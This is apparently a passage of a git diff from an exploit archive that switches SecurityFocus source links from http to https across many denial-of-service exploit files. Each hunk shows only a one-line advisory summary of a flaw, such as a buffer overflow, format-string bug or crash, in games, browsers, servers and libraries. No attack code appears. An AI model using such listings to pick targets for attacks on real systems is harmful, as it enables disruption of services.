https://www.securityfocus.com/bid/25436/info Vavoom is prone to multiple remote vulnerabilities, including a buffer-overflow issue, a format-string issue, and a denial-of-service issue. diff --git a/exploits/multiple/dos/30528.txt b/exploits/multiple/dos/30528.txt index 77f14e154..484968c5d 100644 --- a/exploits/multiple/dos/30528.txt +++ b/exploits/multiple/dos/30528.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25436/info +source: https://www.securityfocus.com/bid/25436/info Vavoom is prone to multiple remote vulnerabilities, including a buffer-overflow issue, a format-string issue, and a denial-of-service issue. diff --git a/exploits/multiple/dos/30529.txt b/exploits/multiple/dos/30529.txt index 51058a89b..528c963d3 100644 --- a/exploits/multiple/dos/30529.txt +++ b/exploits/multiple/dos/30529.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25437/info +source: https://www.securityfocus.com/bid/25437/info Media Player Classic is prone to a buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data. diff --git a/exploits/multiple/dos/30540.txt b/exploits/multiple/dos/30540.txt index ea991617d..56bb64248 100644 --- a/exploits/multiple/dos/30540.txt +++ b/exploits/multiple/dos/30540.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25478/info +source: https://www.securityfocus.com/bid/25478/info StarCraft Brood War is prone to a remote denial-of-service vulnerability because the application fails to handle exceptional conditions. diff --git a/exploits/multiple/dos/30566.txt b/exploits/multiple/dos/30566.txt index 8cc61ff6c..04c5d2f56 100644 --- a/exploits/multiple/dos/30566.txt +++ b/exploits/multiple/dos/30566.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25559/info +source: https://www.securityfocus.com/bid/25559/info Alien Arena 2007 is prone to multiple remote vulnerabilities, including a denial-of-service vulnerability and a format-string vulnerability. diff --git a/exploits/multiple/dos/30574.txt b/exploits/multiple/dos/30574.txt index 38c0f9b2c..eb4a3395c 100644 --- a/exploits/multiple/dos/30574.txt +++ b/exploits/multiple/dos/30574.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25625/info +source: https://www.securityfocus.com/bid/25625/info CellFactor: Revolution is prone to multiple remote code-execution vulnerabilities, including a buffer-overflow issue and a format-string issue. diff --git a/exploits/multiple/dos/30592.py b/exploits/multiple/dos/30592.py index 7dea054e9..7d2b8910b 100755 --- a/exploits/multiple/dos/30592.py +++ b/exploits/multiple/dos/30592.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25696/info +source: https://www.securityfocus.com/bid/25696/info Python's imageop module is prone to multiple integer-overflow vulnerabilities because it fails to properly bounds-check user-supplied input to ensure that integer operations do not overflow. diff --git a/exploits/multiple/dos/30644.txt b/exploits/multiple/dos/30644.txt index db8867977..94e83ae9c 100644 --- a/exploits/multiple/dos/30644.txt +++ b/exploits/multiple/dos/30644.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25944/info +source: https://www.securityfocus.com/bid/25944/info Dawn of Time MUD server is prone to multiple format-string vulnerabilities. diff --git a/exploits/multiple/dos/30702.html b/exploits/multiple/dos/30702.html index 07f904d24..d03c2975a 100644 --- a/exploits/multiple/dos/30702.html +++ b/exploits/multiple/dos/30702.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26172/info +source: https://www.securityfocus.com/bid/26172/info Mozilla Firefox is prone to a remote denial-of-service vulnerability because it fails to adequately sanitize user-supplied input. diff --git a/exploits/multiple/dos/30713.html b/exploits/multiple/dos/30713.html index 539f5c5ec..ced32df43 100644 --- a/exploits/multiple/dos/30713.html +++ b/exploits/multiple/dos/30713.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26216/info +source: https://www.securityfocus.com/bid/26216/info Mozilla Firefox is prone to a vulnerability that results in a persistent denial of service. diff --git a/exploits/multiple/dos/30779.txt b/exploits/multiple/dos/30779.txt index 2bd50f887..2adf7cadf 100644 --- a/exploits/multiple/dos/30779.txt +++ b/exploits/multiple/dos/30779.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26502/info +source: https://www.securityfocus.com/bid/26502/info Rigs of Rods is prone to a remote buffer-overflow because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer. diff --git a/exploits/multiple/dos/30791.txt b/exploits/multiple/dos/30791.txt index 24919b6b5..4968002b3 100644 --- a/exploits/multiple/dos/30791.txt +++ b/exploits/multiple/dos/30791.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26516/info +source: https://www.securityfocus.com/bid/26516/info Multiple denial-of-service vulnerabilities affect I Hear U because the application fails to handle specially crafted packets. diff --git a/exploits/multiple/dos/30814.txt b/exploits/multiple/dos/30814.txt index 12b177b29..6a99bc74a 100644 --- a/exploits/multiple/dos/30814.txt +++ b/exploits/multiple/dos/30814.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26588/info +source: https://www.securityfocus.com/bid/26588/info Skype is prone to a remote denial-of-service vulnerability because of a NULL-pointer dereference flaw. diff --git a/exploits/multiple/dos/30856.txt b/exploits/multiple/dos/30856.txt index cb2b2f23e..1983641f7 100644 --- a/exploits/multiple/dos/30856.txt +++ b/exploits/multiple/dos/30856.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26771/info +source: https://www.securityfocus.com/bid/26771/info Easy File Sharing Web Server is prone to a directory-traversal and multiple information-disclosure vulnerabilities. diff --git a/exploits/multiple/dos/30885.txt b/exploits/multiple/dos/30885.txt index 8b49d9c37..e10a0bcbb 100644 --- a/exploits/multiple/dos/30885.txt +++ b/exploits/multiple/dos/30885.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26856/info +source: https://www.securityfocus.com/bid/26856/info QK SMTP Server is prone to multiple remote denial-of-service vulnerabilities that occur when handling malformed SMTP commands. diff --git a/exploits/multiple/dos/30896.txt b/exploits/multiple/dos/30896.txt index 6053d50ef..1665a5923 100644 --- a/exploits/multiple/dos/30896.txt +++ b/exploits/multiple/dos/30896.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26913/info +source: https://www.securityfocus.com/bid/26913/info Appian Business Process Management Suite (BPMS) is prone to a remote denial-of-service vulnerability because it fails to handle specially crafted packets. diff --git a/exploits/multiple/dos/30903.c b/exploits/multiple/dos/30903.c index 9387a6634..4276d0a1e 100644 --- a/exploits/multiple/dos/30903.c +++ b/exploits/multiple/dos/30903.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26945/info +// source: https://www.securityfocus.com/bid/26945/info The 'id3lib' library is prone to a buffer-overflow vulnerability. diff --git a/exploits/multiple/dos/30906.c b/exploits/multiple/dos/30906.c index fc74de451..fa5aca079 100644 --- a/exploits/multiple/dos/30906.c +++ b/exploits/multiple/dos/30906.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26953/info +// source: https://www.securityfocus.com/bid/26953/info ProWizard 4 PC is prone to multiple stack-based buffer-overflow issues because it fails to perform adequate boundary checks on user-supplied data. diff --git a/exploits/multiple/dos/30922.c b/exploits/multiple/dos/30922.c index 794a7e5cb..6ed67f186 100644 --- a/exploits/multiple/dos/30922.c +++ b/exploits/multiple/dos/30922.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26979/info +// source: https://www.securityfocus.com/bid/26979/info WinUAE is prone to a local stack-based buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it to an insufficiently sized memory buffer. diff --git a/exploits/multiple/dos/30943.txt b/exploits/multiple/dos/30943.txt index 076161ceb..a35f52a54 100644 --- a/exploits/multiple/dos/30943.txt +++ b/exploits/multiple/dos/30943.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27048/info +source: https://www.securityfocus.com/bid/27048/info Libnemesi is prone to multiple buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied input. diff --git a/exploits/multiple/dos/30974.txt b/exploits/multiple/dos/30974.txt index 11ae1faec..f3663964d 100644 --- a/exploits/multiple/dos/30974.txt +++ b/exploits/multiple/dos/30974.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27110/info +source: https://www.securityfocus.com/bid/27110/info Asterisk is prone to a remote denial-of-service vulnerability. diff --git a/exploits/multiple/dos/30989.txt b/exploits/multiple/dos/30989.txt index c093bd43b..549580ff7 100644 --- a/exploits/multiple/dos/30989.txt +++ b/exploits/multiple/dos/30989.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27141/info +source: https://www.securityfocus.com/bid/27141/info Pragma Systems FortressSSH is prone to a remote denial-of-service vulnerability because it fails to adequately handle certain exceptions when processing overly long user-supplied input. diff --git a/exploits/multiple/dos/30990.txt b/exploits/multiple/dos/30990.txt index ed5f23d8e..44b168c48 100644 --- a/exploits/multiple/dos/30990.txt +++ b/exploits/multiple/dos/30990.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27142/info +source: https://www.securityfocus.com/bid/27142/info Foxit WAC Server is prone to a denial-of-service vulnerability because the application fails to perform adequate boundary checks on user-supplied data. diff --git a/exploits/multiple/dos/30991.txt b/exploits/multiple/dos/30991.txt index a9b63249f..e4486ca21 100644 --- a/exploits/multiple/dos/30991.txt +++ b/exploits/multiple/dos/30991.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27143/info +source: https://www.securityfocus.com/bid/27143/info Pragma TelnetServer is prone to a denial-of-service vulnerability because it fails to adequately handle certain telnet options. diff --git a/exploits/multiple/dos/31100.txt b/exploits/multiple/dos/31100.txt index 2032ff867..56f54ca72 100644 --- a/exploits/multiple/dos/31100.txt +++ b/exploits/multiple/dos/31100.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27593/info +source: https://www.securityfocus.com/bid/27593/info Anon Proxy Server is prone to a remote buffer-overflow vulnerability because the application fails to sufficiently bounds-check user-supplied input. diff --git a/exploits/multiple/dos/31128.txt b/exploits/multiple/dos/31128.txt index 38ce21324..4b2e38476 100644 --- a/exploits/multiple/dos/31128.txt +++ b/exploits/multiple/dos/31128.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27701/info +source: https://www.securityfocus.com/bid/27701/info Multiple IEA Software products are prone to a denial-of-service vulnerability. diff --git a/exploits/multiple/dos/31136.txt b/exploits/multiple/dos/31136.txt index e514c2526..f229f4ff4 100644 --- a/exploits/multiple/dos/31136.txt +++ b/exploits/multiple/dos/31136.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27728/info +source: https://www.securityfocus.com/bid/27728/info Multiple cyan soft products are affected by a format-string vulnerability because they fail to adequately sanitize user-supplied input before passing it as the format-specifier to a formatted-printing function. diff --git a/exploits/multiple/dos/31148.txt b/exploits/multiple/dos/31148.txt index b5c26ceef..cbb6c351b 100644 --- a/exploits/multiple/dos/31148.txt +++ b/exploits/multiple/dos/31148.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27734/info +source: https://www.securityfocus.com/bid/27734/info Opium OPI Server and CyanPrintIP are prone to a denial-of-service vulnerability and a format-string vulnerability. diff --git a/exploits/multiple/dos/31150.txt b/exploits/multiple/dos/31150.txt index c9a7431c5..1522c9d76 100644 --- a/exploits/multiple/dos/31150.txt +++ b/exploits/multiple/dos/31150.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27742/info +source: https://www.securityfocus.com/bid/27742/info RPM Remote Print Manager is prone to a remote buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input before copying it into an insufficiently sized buffer. diff --git a/exploits/multiple/dos/31203.txt b/exploits/multiple/dos/31203.txt index c4dbce58e..bdd1f6ac2 100644 --- a/exploits/multiple/dos/31203.txt +++ b/exploits/multiple/dos/31203.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27812/info +source: https://www.securityfocus.com/bid/27812/info Mozilla Firefox is prone to a remote denial-of-service vulnerability because of the way the browser handles IFrames. diff --git a/exploits/multiple/dos/31232.txt b/exploits/multiple/dos/31232.txt index 9c13d6342..e2b1aec83 100644 --- a/exploits/multiple/dos/31232.txt +++ b/exploits/multiple/dos/31232.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27873/info +source: https://www.securityfocus.com/bid/27873/info Foxit WAC Remote Access Server is prone to a heap-based buffer-overflow vulnerability. diff --git a/exploits/multiple/dos/31271.txt b/exploits/multiple/dos/31271.txt index 68a0d3b8a..d9b724ddc 100644 --- a/exploits/multiple/dos/31271.txt +++ b/exploits/multiple/dos/31271.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27914/info +source: https://www.securityfocus.com/bid/27914/info Sybase MobiLink is prone to multiple heap-based buffer-overflow vulnerabilities because the application fails to perform adequate boundary checks on user-supplied data. diff --git a/exploits/multiple/dos/31285.txt b/exploits/multiple/dos/31285.txt index 79d2e88e4..97ed3304d 100644 --- a/exploits/multiple/dos/31285.txt +++ b/exploits/multiple/dos/31285.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27940/info +source: https://www.securityfocus.com/bid/27940/info Zilab Chat and Instant Messaging (ZIM) Server is prone to multiple vulnerabilities, including denial-of-service issues and memory-corruption issues. diff --git a/exploits/multiple/dos/31327.txt b/exploits/multiple/dos/31327.txt index 7729067a8..a6a31dbaf 100644 --- a/exploits/multiple/dos/31327.txt +++ b/exploits/multiple/dos/31327.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28080/info +source: https://www.securityfocus.com/bid/28080/info Borland StarTeam is prone to multiple issues, including multiple integer-overflow vulnerabilities, a heap-overflow vulnerability, and a denial-of-service vulnerability. diff --git a/exploits/multiple/dos/31343.txt b/exploits/multiple/dos/31343.txt index e1d08cece..f953471b3 100644 --- a/exploits/multiple/dos/31343.txt +++ b/exploits/multiple/dos/31343.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28125/info +source: https://www.securityfocus.com/bid/28125/info Sun Java Runtime Environment is prone to a heap-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. diff --git a/exploits/multiple/dos/31376.txt b/exploits/multiple/dos/31376.txt index bbed20065..04274e34e 100644 --- a/exploits/multiple/dos/31376.txt +++ b/exploits/multiple/dos/31376.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28169/info +source: https://www.securityfocus.com/bid/28169/info Acronis True Image Echo Enterprise Server is prone to multiple remote denial-of-service vulnerabilities. diff --git a/exploits/multiple/dos/31378.txt b/exploits/multiple/dos/31378.txt index acec98496..0d3d9dc83 100644 --- a/exploits/multiple/dos/31378.txt +++ b/exploits/multiple/dos/31378.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28175/info +source: https://www.securityfocus.com/bid/28175/info RemotelyAnywhere is prone to a remote denial-of-service vulnerability because it fails to adequately sanitize user-supplied input. diff --git a/exploits/multiple/dos/31542.txt b/exploits/multiple/dos/31542.txt index 7eaadb4e7..bf1380031 100644 --- a/exploits/multiple/dos/31542.txt +++ b/exploits/multiple/dos/31542.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28468/info +source: https://www.securityfocus.com/bid/28468/info IBM solidDB is prone to a format-string vulnerability affecting the logging function and three denial-of-service vulnerabilities. diff --git a/exploits/multiple/dos/31728.txt b/exploits/multiple/dos/31728.txt index 18dbf73f1..a8a429814 100644 --- a/exploits/multiple/dos/31728.txt +++ b/exploits/multiple/dos/31728.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29026/info +source: https://www.securityfocus.com/bid/29026/info Call of Duty is prone to a denial-of-service vulnerability because the application fails to handle specially crafted commands. diff --git a/exploits/multiple/dos/31785.txt b/exploits/multiple/dos/31785.txt index 093b45ae2..c8592efa4 100644 --- a/exploits/multiple/dos/31785.txt +++ b/exploits/multiple/dos/31785.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29190/info +source: https://www.securityfocus.com/bid/29190/info Multiple operating systems are prone to remote denial-of-service vulnerabilities that occur when affected operating systems are acting as IPv6 routers. diff --git a/exploits/multiple/dos/31817.html b/exploits/multiple/dos/31817.html index 765433324..b7cd04824 100644 --- a/exploits/multiple/dos/31817.html +++ b/exploits/multiple/dos/31817.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29318/info +source: https://www.securityfocus.com/bid/29318/info Mozilla Firefox is prone to a remote denial-of-service vulnerability when running certain JavaScript commands on empty applets in an iframe. diff --git a/exploits/multiple/dos/31872.py b/exploits/multiple/dos/31872.py index 55ec1efd0..889f0f3f0 100755 --- a/exploits/multiple/dos/31872.py +++ b/exploits/multiple/dos/31872.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29517/info +source: https://www.securityfocus.com/bid/29517/info NASA Ames Research Center BigView is prone to a remote stack-based buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it to an insufficiently sized memory buffer. diff --git a/exploits/multiple/dos/31919.c b/exploits/multiple/dos/31919.c index bad7860d8..10de1009e 100644 --- a/exploits/multiple/dos/31919.c +++ b/exploits/multiple/dos/31919.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29723/info +// source: https://www.securityfocus.com/bid/29723/info S.T.A.L.K.E.R. game servers are prone to a remote denial-of-service vulnerability because the software fails to handle exceptional conditions when processing user nicknames. diff --git a/exploits/multiple/dos/31931.txt b/exploits/multiple/dos/31931.txt index 0d8858373..01439ff36 100644 --- a/exploits/multiple/dos/31931.txt +++ b/exploits/multiple/dos/31931.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29759/info +source: https://www.securityfocus.com/bid/29759/info Crysis is prone to a remote denial-of-service vulnerability because the application fails to handle exceptional conditions. diff --git a/exploits/multiple/dos/31932.txt b/exploits/multiple/dos/31932.txt index fb6fe78e7..03092dd18 100644 --- a/exploits/multiple/dos/31932.txt +++ b/exploits/multiple/dos/31932.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29760/info +source: https://www.securityfocus.com/bid/29760/info Skulltag is prone to a vulnerability that can cause denial-of-service conditions. diff --git a/exploits/multiple/dos/31957.txt b/exploits/multiple/dos/31957.txt index bf988ee9f..0df6eba2d 100644 --- a/exploits/multiple/dos/31957.txt +++ b/exploits/multiple/dos/31957.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29888/info +source: https://www.securityfocus.com/bid/29888/info World in Conflict is prone to a remote denial-of-service vulnerability because the application fails to handle exceptional conditions. diff --git a/exploits/multiple/dos/31958.txt b/exploits/multiple/dos/31958.txt index 6f3f3762f..20f66fb56 100644 --- a/exploits/multiple/dos/31958.txt +++ b/exploits/multiple/dos/31958.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29889/info +source: https://www.securityfocus.com/bid/29889/info SunAge is prone to multiple denial-of-service vulnerabilities. diff --git a/exploits/multiple/dos/31998.txt b/exploits/multiple/dos/31998.txt index 392576914..a19a5f71d 100644 --- a/exploits/multiple/dos/31998.txt +++ b/exploits/multiple/dos/31998.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29997/info +source: https://www.securityfocus.com/bid/29997/info S.T.A.L.K.E.R is prone to multiple remote vulnerabilities: diff --git a/exploits/multiple/dos/31999.txt b/exploits/multiple/dos/31999.txt index 6969ae8a7..74ad1f7ec 100644 --- a/exploits/multiple/dos/31999.txt +++ b/exploits/multiple/dos/31999.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30010/info +source: https://www.securityfocus.com/bid/30010/info IBM Tivoli Directory Server is prone to a denial-of-service vulnerability because the server contains a double-free error. diff --git a/exploits/multiple/dos/32006.txt b/exploits/multiple/dos/32006.txt index 4ef2b64f2..b7afb9d1f 100644 --- a/exploits/multiple/dos/32006.txt +++ b/exploits/multiple/dos/32006.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30020/info +source: https://www.securityfocus.com/bid/30020/info Wireshark is prone to multiple vulnerabilities, including an information-disclosure issue and denial-of-service issues. diff --git a/exploits/multiple/dos/32086.c b/exploits/multiple/dos/32086.c index e79b065f0..ed0956762 100644 --- a/exploits/multiple/dos/32086.c +++ b/exploits/multiple/dos/32086.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30299/info +// source: https://www.securityfocus.com/bid/30299/info SWAT 4 is prone to multiple remote denial-of-service vulnerabilities because the application fails to properly handle certain input. diff --git a/exploits/multiple/dos/32104.txt b/exploits/multiple/dos/32104.txt index 5d8c5a75f..748315e11 100644 --- a/exploits/multiple/dos/32104.txt +++ b/exploits/multiple/dos/32104.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30340/info +source: https://www.securityfocus.com/bid/30340/info ZDaemon is prone to a remote denial-of-service vulnerability because the application fails to handle NULL-pointer exceptions. diff --git a/exploits/multiple/dos/32125.txt b/exploits/multiple/dos/32125.txt index d125dd7e4..a5e624b4a 100644 --- a/exploits/multiple/dos/32125.txt +++ b/exploits/multiple/dos/32125.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30427/info +source: https://www.securityfocus.com/bid/30427/info Unreal Tournament 2004 is prone to a remote denial-of-service vulnerability because the application fails to handle NULL-pointer exceptions. diff --git a/exploits/multiple/dos/32127.txt b/exploits/multiple/dos/32127.txt index 0cca29040..15e7cfee6 100644 --- a/exploits/multiple/dos/32127.txt +++ b/exploits/multiple/dos/32127.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30430/info +source: https://www.securityfocus.com/bid/30430/info Unreal Tournament 3 is prone to multiple remote vulnerabilities, including a denial-of-service issue and a memory-corruption issue. diff --git a/exploits/multiple/dos/32192.txt b/exploits/multiple/dos/32192.txt index 9f8e97f2e..e776fc65a 100644 --- a/exploits/multiple/dos/32192.txt +++ b/exploits/multiple/dos/32192.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30582/info +source: https://www.securityfocus.com/bid/30582/info Halo: Combat Evolved is prone to multiple remote denial-of-service vulnerabilities because the application fails to properly handle specially crafted network packets. diff --git a/exploits/multiple/dos/32193.txt b/exploits/multiple/dos/32193.txt index cb6181694..79c05c66b 100644 --- a/exploits/multiple/dos/32193.txt +++ b/exploits/multiple/dos/32193.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30589/info +source: https://www.securityfocus.com/bid/30589/info The finger service ('fingerd') on OpenVMS is prone to a stack-based buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied input. diff --git a/exploits/multiple/dos/32194.txt b/exploits/multiple/dos/32194.txt index 21a52ce6d..f573a3d45 100644 --- a/exploits/multiple/dos/32194.txt +++ b/exploits/multiple/dos/32194.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30605/info +source: https://www.securityfocus.com/bid/30605/info NoticeWare Email Server NG is prone to a denial-of-service vulnerability because it fails to handle user-supplied input. diff --git a/exploits/multiple/dos/32195.txt b/exploits/multiple/dos/32195.txt index b98f718ac..7ce9bad75 100644 --- a/exploits/multiple/dos/32195.txt +++ b/exploits/multiple/dos/32195.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30606/info +source: https://www.securityfocus.com/bid/30606/info WinGate is prone to a remote denial-of-service vulnerability affecting the application's IMAP email server. diff --git a/exploits/multiple/dos/32222.rb b/exploits/multiple/dos/32222.rb index b210a9852..690f8c004 100755 --- a/exploits/multiple/dos/32222.rb +++ b/exploits/multiple/dos/32222.rb @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30644/info +source: https://www.securityfocus.com/bid/30644/info Ruby is prone to multiple vulnerabilities that can be leveraged to bypass security restrictions or cause a denial of service: diff --git a/exploits/multiple/dos/32310.txt b/exploits/multiple/dos/32310.txt index e069c2543..02570cb02 100644 --- a/exploits/multiple/dos/32310.txt +++ b/exploits/multiple/dos/32310.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30970/info +source: https://www.securityfocus.com/bid/30970/info Softalk Mail Server is prone to a remote denial-of-service vulnerability because the application fails to perform adequate boundary checks on user-supplied data. diff --git a/exploits/multiple/dos/32311.html b/exploits/multiple/dos/32311.html index bca675f53..e57ed31c3 100644 --- a/exploits/multiple/dos/32311.html +++ b/exploits/multiple/dos/32311.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30975/info +source: https://www.securityfocus.com/bid/30975/info Google Chrome is prone to a remote denial-of-service vulnerability because it fails to handle user-supplied input. diff --git a/exploits/multiple/dos/32335.js b/exploits/multiple/dos/32335.js index 4b744123b..146940f2a 100644 --- a/exploits/multiple/dos/32335.js +++ b/exploits/multiple/dos/32335.js @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31035/info +source: https://www.securityfocus.com/bid/31035/info Google Chrome is prone to a remote denial-of-service vulnerability because the application fails to handle specially crafted HTTP 'view-source' headers. diff --git a/exploits/multiple/dos/32362.txt b/exploits/multiple/dos/32362.txt index c08187484..235a2ec09 100644 --- a/exploits/multiple/dos/32362.txt +++ b/exploits/multiple/dos/32362.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31140/info +source: https://www.securityfocus.com/bid/31140/info Unreal Engine is prone to a remote denial-of-service vulnerability because of an error in memory allocation. diff --git a/exploits/multiple/dos/32381.js b/exploits/multiple/dos/32381.js index db25a363f..fa657e322 100644 --- a/exploits/multiple/dos/32381.js +++ b/exploits/multiple/dos/32381.js @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31155/info +source: https://www.securityfocus.com/bid/31155/info Avant Browser is prone to an integer-overflow vulnerability that occurs in the JavaScript engine. diff --git a/exploits/multiple/dos/32386.txt b/exploits/multiple/dos/32386.txt index d7aa11c26..36a8b8c9c 100644 --- a/exploits/multiple/dos/32386.txt +++ b/exploits/multiple/dos/32386.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31205/info +source: https://www.securityfocus.com/bid/31205/info Unreal Engine is prone to a remote denial-of-service vulnerability because of an error in memory allocation. diff --git a/exploits/multiple/dos/32400.html b/exploits/multiple/dos/32400.html index 8d7fe3a03..a3330ecdf 100644 --- a/exploits/multiple/dos/32400.html +++ b/exploits/multiple/dos/32400.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31294/info +source: https://www.securityfocus.com/bid/31294/info Foxmail Email Client is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. diff --git a/exploits/multiple/dos/32581.txt b/exploits/multiple/dos/32581.txt index a9e34f7cc..a1b6bb6f7 100644 --- a/exploits/multiple/dos/32581.txt +++ b/exploits/multiple/dos/32581.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32267/info +source: https://www.securityfocus.com/bid/32267/info Zope is prone to multiple remote denial-of-service vulnerabilities. diff --git a/exploits/multiple/dos/32596.txt b/exploits/multiple/dos/32596.txt index ad8a174ff..07a6815bc 100644 --- a/exploits/multiple/dos/32596.txt +++ b/exploits/multiple/dos/32596.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32377/info +source: https://www.securityfocus.com/bid/32377/info GeSHi is prone to a remote denial-of-service vulnerability. diff --git a/exploits/multiple/dos/32712.txt b/exploits/multiple/dos/32712.txt index c8923ff7a..4a919391e 100644 --- a/exploits/multiple/dos/32712.txt +++ b/exploits/multiple/dos/32712.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33169/info +source: https://www.securityfocus.com/bid/33169/info IBM WebSphere DataPower XML Security Gateway XS40 is prone to a remote denial-of-service vulnerability because it fails to handle user-supplied input. diff --git a/exploits/multiple/dos/32774.txt b/exploits/multiple/dos/32774.txt index e01fecba7..11f56cc8a 100644 --- a/exploits/multiple/dos/32774.txt +++ b/exploits/multiple/dos/32774.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33609/info +source: https://www.securityfocus.com/bid/33609/info QIP 2005 is prone to a remote denial-of-service vulnerability. diff --git a/exploits/multiple/dos/32836.html b/exploits/multiple/dos/32836.html index 200257f32..ccfc6ae0f 100644 --- a/exploits/multiple/dos/32836.html +++ b/exploits/multiple/dos/32836.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33969/info +source: https://www.securityfocus.com/bid/33969/info Mozilla Firefox is prone to a remote denial-of-service vulnerability. diff --git a/exploits/multiple/dos/32949.txt b/exploits/multiple/dos/32949.txt index 330b2be12..6caa84d8a 100644 --- a/exploits/multiple/dos/32949.txt +++ b/exploits/multiple/dos/32949.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34685/info +source: https://www.securityfocus.com/bid/34685/info Mani's Admin Plugin is prone to a remote denial-of-service vulnerability. diff --git a/exploits/multiple/dos/33037.html b/exploits/multiple/dos/33037.html index ba9d1753c..e03412f8b 100644 --- a/exploits/multiple/dos/33037.html +++ b/exploits/multiple/dos/33037.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35359/info +source: https://www.securityfocus.com/bid/35359/info Apple QuickTime is prone to a denial-of-service vulnerability. diff --git a/exploits/multiple/dos/33058.txt b/exploits/multiple/dos/33058.txt index 29e4c7138..760c0b8e3 100644 --- a/exploits/multiple/dos/33058.txt +++ b/exploits/multiple/dos/33058.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35510/info +source: https://www.securityfocus.com/bid/35510/info Multiple BSD distributions are prone to a memory-corruption vulnerability because the software fails to properly bounds-check data used as an array index. diff --git a/exploits/multiple/dos/33080.txt b/exploits/multiple/dos/33080.txt index 6f3bf2a8f..6a9c47878 100644 --- a/exploits/multiple/dos/33080.txt +++ 